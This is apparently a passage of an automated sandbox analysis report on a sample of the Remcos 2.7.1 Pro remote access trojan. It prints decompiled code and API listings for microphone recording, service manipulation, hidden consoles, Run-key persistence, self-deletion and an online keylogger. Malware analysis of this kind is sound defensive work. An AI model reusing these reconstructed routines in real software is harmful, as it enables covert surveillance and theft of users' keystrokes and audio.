                                  • SetEvent.KERNEL32(?), ref: 00411CF8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                  • String ID:
                                  • API String ID: 3236006214-0
                                  • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                  • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00401519(WCHAR* __eax, void* __eflags) {
                                  				char* _t4;
                                  				signed int _t5;
                                  				CHAR* _t10;
                                  				signed int _t11;
                                  				signed int _t19;
                                  				signed int _t20;
                                  				intOrPtr* _t26;
                                  				void* _t27;
                                  
                                  				_t27 = __eflags;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				CreateDirectoryW(__eax, 0);
                                  				0x41b218->wFormatTag = 1;
                                  				 *0x41b21a = 1;
                                  				 *0x41b21c = 0x1f40;
                                  				 *0x41b226 = 8;
                                  				 *0x41b220 = 0x1f40;
                                  				 *0x41b224 = 1;
                                  				 *0x41b228 = 0;
                                  				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t5 = atoi(_t4);
                                  				_t19 =  *0x41b21c; // 0x0
                                  				 *_t26 = 0x30008;
                                  				_t20 = _t19 * _t5 * 0x3c;
                                  				 *0x41b1d0 = _t20;
                                  				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
                                  				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
                                  				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				0x41b1a0->lpData = _t10;
                                  				_t11 =  *0x41b1d8; // 0x0
                                  				 *0x41b1a4 = _t11;
                                  				 *0x41b1a8 = 0;
                                  				 *0x41b1ac = 0;
                                  				 *0x41b1b0 = 0;
                                  				 *0x41b1b4 = 0;
                                  				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                  				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                  				waveInStart( *0x41b210);
                                  				return 0;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                  • atoi.MSVCRT ref: 0040157F
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                  • waveInStart.WINMM ref: 00401633
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 1097200658-0
                                  • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                  • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                  • SetEvent.KERNEL32(?), ref: 0040F16D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040F18E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                    • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                    • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                    • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                    • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                    • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                    • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                    • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                    • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID:
                                  • API String ID: 3444260106-0
                                  • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                  • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004117C7(void* _a4) {
                                  				intOrPtr _v28;
                                  				struct _SERVICE_STATUS _v32;
                                  				short* _t6;
                                  				signed int _t12;
                                  				int _t20;
                                  				void* _t23;
                                  				void* _t24;
                                  
                                  				_t20 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 0x11);
                                  				_t24 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
                                  				if(_t23 != 0) {
                                  					if(ControlService(_t23, 1,  &_v32) != 0) {
                                  						do {
                                  							QueryServiceStatus(_t23,  &_v32);
                                  						} while (_v28 != 1);
                                  						_t12 = StartServiceW(_t23, 0, 0);
                                  						asm("sbb eax, eax");
                                  						_t20 = ( ~_t12 & 0x000000fe) + 3;
                                  					} else {
                                  						_t20 = 2;
                                  					}
                                  					CloseServiceHandle(_t24);
                                  					CloseServiceHandle(_t23);
                                  				} else {
                                  					CloseServiceHandle(_t24);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t20;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                  • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 1054C61B: TerminateProcess.KERNEL32(00000000,?,10549BE2), ref: 1054C62B
                                    • Part of subcall function 1054C61B: WaitForSingleObject.KERNEL32(000000FF,?,10549BE2), ref: 1054C63E
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 10549CF7
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 10549D07
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 10549D3C
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 10549D4E
                                    • Part of subcall function 105486D0: UnhookWindowsHookEx.USER32(00000000), ref: 105486EE
                                  • _wgetenv.MSVCRT ref: 10549D69
                                    • Part of subcall function 105546E5: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 10549F2B
                                  • exit.MSVCRT ref: 10549F32
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Attributes$CreateDeleteExecuteHookModuleNameObjectProcessShellSingleTerminateUnhookWaitWindows_wgetenvexit
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 3812567522-243400593
                                  • Opcode ID: c6b649699b8b5dc46a2b5c7f0e2011479e33f8cd10f62a48fb2ad5eb8340c622
                                  • Instruction ID: 0a8844e6cf5ea517a5c17d45514ddb062cfa07a67f858ba951adaf1db21cd8b8
                                  • Opcode Fuzzy Hash: c6b649699b8b5dc46a2b5c7f0e2011479e33f8cd10f62a48fb2ad5eb8340c622
                                  • Instruction Fuzzy Hash: 53917572900509ABDB00D7E0ED5EAEE7B7CEF84345F648065F902E3090EB755E49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E00413D3D(signed int __edx, intOrPtr _a4) {
                                  				void _v1003;
                                  				char _v1004;
                                  				struct HWND__* _t13;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				unsigned int _t40;
                                  				signed int _t41;
                                  				signed int _t47;
                                  				signed int _t50;
                                  				signed int _t56;
                                  				signed int _t59;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				void* _t91;
                                  				void* _t92;
                                  				void* _t93;
                                  
                                  				_t64 = __edx;
                                  				AllocConsole();
                                  				_t13 =  *0x41c1f8();
                                  				 *0x41c1fc = _t13;
                                  				if(_a4 == 0) {
                                  					ShowWindow(_t13, 0);
                                  				}
                                  				freopen("CONOUT$", "a", __imp___iob + 0x20);
                                  				_v1004 = 0;
                                  				memset( &_v1003, 0, 0xf9 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				_t65 = _t64 | 0xffffffff;
                                  				asm("repne scasb");
                                  				_t40 =  !_t65;
                                  				_t91 = " * Remcos v" - _t40;
                                  				_t41 = _t40 >> 2;
                                  				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                  				asm("repne scasb");
                                  				_t47 =  !_t65;
                                  				_t92 = "2.7.1 Pro" - _t47;
                                  				_t34 = _t47;
                                  				asm("repne scasb");
                                  				_t50 = _t34 >> 2;
                                  				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                  				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                  				asm("repne scasb");
                                  				_t56 =  !_t65;
                                  				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
                                  				_t36 = _t56;
                                  				asm("repne scasb");
                                  				_t59 = _t36 >> 2;
                                  				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                  				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                  				return printf( &_v1004);
                                  			}

                                  APIs
                                  • AllocConsole.KERNEL32(761B43E0,0041BCB0,00000000), ref: 00413D49
                                  • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                  • freopen.MSVCRT ref: 00413D7C
                                  • printf.MSVCRT ref: 00413E25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.1 Pro$CONOUT$
                                  • API String ID: 3419900118-4274912840
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 45%
                                  			E00405BC0(void* __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t8;
                                  				void* _t31;
                                  
                                  				_push(__ecx);
                                  				_t31 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                  					 *((char*)(__ecx + 0x3d)) = 1;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                  					E00405DD3(__ecx);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
                                  					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
                                  						E00405156(_t31);
                                  						if( *_t31 == 0) {
                                  							CreateThread(0, 0, E0040526A, _t31, 0, 0);
                                  						}
                                  						CreateThread(0, 0, E00405299, _t31, 0, 0);
                                  					}
                                  					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
                                  					 *(_t31 + 0x28) = _t8;
                                  				}
                                  				return _t8;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
